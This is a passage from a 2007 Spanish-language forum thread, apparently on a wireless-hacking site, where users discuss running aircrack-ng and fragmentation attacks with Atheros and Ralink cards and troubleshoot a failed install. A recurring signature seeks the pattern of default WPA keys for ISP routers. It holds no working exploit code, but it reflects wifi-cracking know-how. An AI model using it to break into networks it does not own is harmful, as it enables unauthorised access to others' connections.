estas usando USB rt2570   o una atheros驴驴

En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
apokeklipse
*
Desconectado Desconectado

Mensajes: 4


« Respuesta #31 : 19-02-2007, 10:38:41 (Lunes) »

Tengo una Ralink RT2500 PCI...

No s茅 si el archivo cap ese tendr谩 algo q ver, una pregunta, en el aircrack, cual es el capture fileHuh  Grin
En línea
rh3nt0n
Administrador
*
Desconectado Desconectado

Mensajes: 1306


" si, vis pacem , para bellum "


« Respuesta #32 : 19-02-2007, 13:19:43 (Lunes) »

Tengo una Ralink RT2500 PCI...

No s茅 si el archivo cap ese tendr谩 algo q ver, una pregunta, en el aircrack, cual es el capture fileHuh  Grin

el archivo *.cap o *.ivs , que guarda los datos que captura airodump.
En línea

No hay pasado ni futuro en la existencia, la existencia es solo presente.
Antes de preguntar lee ESTO.
*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #33 : 20-02-2007, 04:18:09 (Martes) »

Aun no probe mucho con atheros.........parece que funciona....con los madwifi-ng y el aircrack-ng 0.7......espero que con el aircrack-ng-m-e.1.0 tambien...............aunque a mi nunca me consigue  2 veces el
Got relayed paquet!

ya que much@s tenemos atheros.........
LO PROBAMOS???

el dia que funcione con atheros, modifico la USB y la retiro pa otros asuntos
« Última modificación: 20-02-2007, 06:30:24 (Martes) por *dudux » En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
pianista
Chopchoping
Moderador Global
******
Desconectado Desconectado

Mensajes: 1849



WWW
« Respuesta #34 : 21-02-2007, 10:14:43 (Miércoles) »

Hombre pues yo si quieres te mando muis trocitos de atheros pa alla Grin Grin Grin Grin
En serio si un dia hago lo que tu sabes te ayudo ok??
Saludoss jefe cuidate
En línea

*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #35 : 21-02-2007, 14:34:41 (Miércoles) »

Hombre pues yo si quieres te mando muis trocitos de atheros pa alla Grin Grin Grin Grin
En serio si un dia hago lo que tu sabes te ayudo ok??
Saludoss jefe cuidate

 Grin Grin Grin

la verdad que lo estoy probando bastante con atheros........haber si me iinstalo el aircrack-ng 0.7 y lo pruebo........en vez de afrag es aircrack-ng -5
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
pianista
Chopchoping
Moderador Global
******
Desconectado Desconectado

Mensajes: 1849



WWW
« Respuesta #36 : 21-02-2007, 15:22:34 (Miércoles) »

Pues na a currar jefe y a ver si ya confirmamos que funciona jejje Wink Wink
Saludosss
En línea

*dudux
crustchaos orK枚punK
Moderador Global
******
Desconectado Desconectado

Mensajes: 4775



« Respuesta #37 : 22-02-2007, 01:12:41 (Jueves) »

4 ojos ven mas que 2............... :o
En línea



Buscando patron de  claves por defecto de las nuevas WLAN_XXXX con WPA
Mandamelo por privado
litris
**
Desconectado Desconectado

Mensajes: 51


« Respuesta #38 : 22-02-2007, 10:17:26 (Jueves) »

Hola! yo tambien estoy intentando instalar aircrack -ng 0.7 pero me da un error al hacer el make && make install.

make: No se hace nada para `default'.
install -d /usr/local/bin

install -m 755 aircrack-ng airdecap-ng packetforge-ng ivstools kstats /usr/local/bin

install: no se puede crear el fichero regular `/usr/local/bin/aircrack-ng': Permiso denegado

install: no se puede crear el fichero regular `/usr/local/bin/airdecap-ng': Permiso denegado

install: no se puede crear el fichero regular `/usr/local/bin/packetforge-ng': Permiso denegado

install: no se puede crear el fichero regular `/usr/local/bin/ivstools': Permiso denegado

install: no se puede crear el fichero regular `/usr/local/bin/kstats': Permiso denegado

make: *** [install] Error 1

Utilizo linux ubuntu 6.10 con tarjeta atheros.
En línea
rh3nt0n
Administrador
*
Desconectado Desconectado

Mensajes: 1306


" si, vis pacem , para bellum "


« Respuesta #39 : 22-02-2007, 14:09:20 (Jueves) »

Hola! yo tambien estoy intentando instalar aircrack -ng 0.7 pero me da un error al hacer el make && make install.

make: No se hace nada para `default'.
install -d /usr/local/bin

install -m 755 aircrack-ng airdecap-ng packetforge-ng ivstools kstats /usr/local/bin

install: no se puede crear el fichero regular `/usr/local/bin/aircrack-ng': Permiso denegado

install: no se puede crear el fichero regular `/usr/local/bin/airdecap-ng': Permiso denegado

install: no se puede crear el fichero regular `/usr/local/bin/packetforge-ng': Permiso denegado

install: no se puede crear el fichero regular `/usr/local/bin/ivstools': Permiso denegado

install: no se puede crear el fichero regular `/usr/local/bin/kstats': Permiso denegado

make: *** [install] Error 1

Utilizo linux ubuntu 6.10 con tarjeta atheros.

y dale ....

tu problema es que no tienes instaladas las sources .. te lo he repetido varias veces ..
mira los hilos en los que ya tienes respuesta , no te hace falta ni tan siquiera conexion a inet .Con el cd de instalacion lo instalas .. si no quieres/sabes instalarlas desde linea   de comando utiliza sinaptycs , pero haz el favor de no emborronar mas hilos con el mismo log .
En línea

No hay pasado ni futuro en la existencia, la existencia es solo presente.
Antes de preguntar lee ESTO.
Páginas: 1 2 » Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión


elHacker     designhacks     anelkaos     laUltimaEsencia

BitsDeLocos     gokteam     TuFonera     unMundoLibre

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC